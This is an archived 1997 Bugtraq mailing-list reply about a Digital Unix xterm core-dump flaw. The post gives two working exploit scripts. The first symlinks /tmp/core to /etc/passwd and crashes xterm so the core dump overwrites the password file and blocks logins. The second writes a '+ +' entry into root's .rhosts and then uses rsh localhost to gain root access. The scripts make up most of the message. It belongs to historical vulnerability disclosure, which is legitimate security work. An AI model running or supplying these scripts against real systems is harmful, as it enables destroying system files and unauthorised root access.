Bugtraq mailing list archives
Re: Digital Unix Security Problem
From: codewarrior () daemon org (Andrew Brown)
Date: Thu, 13 Nov 1997 11:32:23 -0500
Even with a buffer overflow, I've never seen anyone exploit on one
DU. If anyone has done so sucessfully, plese email me. Despite that, a
person with basic knowledge of unix could easily do something like:
#/!bin/csh
cd /tmp
ln -s /etc/passwd /tmp/core
setenv DISPLAY abcdefghi
/usr/bin/X11/xterm
The contents of /etc/passwd becomes xterm's core, preventing
further logins. Obviously you could do things without an immediate impact
such as ln -s /vmunix /tmp/core.
or...if the system you're on is actually running r-services, you could do #!/bin/sh DISPLAY=" + + " export DISPLAY cd /tmp ln -s /.rhosts /tmp/core /usr/bin/X11/xterm rsh localhost which sets the DISPLAY variable to an "admit all from all" line and the core dump will go into root's .rhosts file. then all that remains is the rsh localhost and you're all set! considerably easier than a buffer overflow exploit... -- |-----< "CODE WARRIOR" >-----| andrew () echonyc com (TheMan) * "ah! i see you have the internet codewarrior () daemon org that goes *ping*!" warfare () graffiti com * "information is power -- share the wealth."
Current thread:
- Digital Unix Security Problem Tom Leffingwell (Nov 12)
- Re: Digital Unix Security Problem Andrew Brown (Nov 13)
- Re: Digital Unix Security Problem Tom Leffingwell (Nov 13)
- (LOWNOISE) Another Digital Unix Security Problem0 Efrain Torres Mejia (Nov 18)
- Re: Digital Unix Security Problem Andrew Brown (Nov 13)